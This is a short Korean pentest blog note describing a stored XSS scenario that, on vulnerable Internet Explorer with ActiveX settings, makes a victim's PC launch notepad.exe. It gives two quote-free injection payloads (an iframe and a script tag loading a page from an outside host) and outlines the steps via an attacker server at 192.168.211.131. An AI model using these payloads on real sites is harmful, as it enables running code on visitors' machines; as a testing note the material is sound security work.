Notice
Recent Posts
Recent Comments
Link
«   2024/12   »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31
Archives
Today
Total
관리 메뉴

의미없는 블로그

싱글쿼터 없이 Stored XSS 시나리오 (notepad.exe 실행) 본문

# 나/pentest (WEB)

싱글쿼터 없이 Stored XSS 시나리오 (notepad.exe 실행)

SaltLee 2019. 12. 4. 17:17

싱글쿼터 안들어가는 XSS 구문

<iframe src=http://test.com></iframe>

<script src=http://test.com></script>

 

1) 공격자 서버(192.168.211.131)에 test.html 생성

2) test.html 내용 (희생자 PC의 notepad 실행시키는)

test.html
0.00MB
test2.html
0.00MB

 

3) XSS 존재하는 페이지에 악성 스크립트 삽입 시도 (공격자 서버의 test.html 접속하는 스크립트)

4) 희생자가 XSS 포인트 클릭

5) 희생자 PC에서 notepad 실행됨 

IE 취약한 브라우저에서만 된다

ActiveX 설정 관련

Comments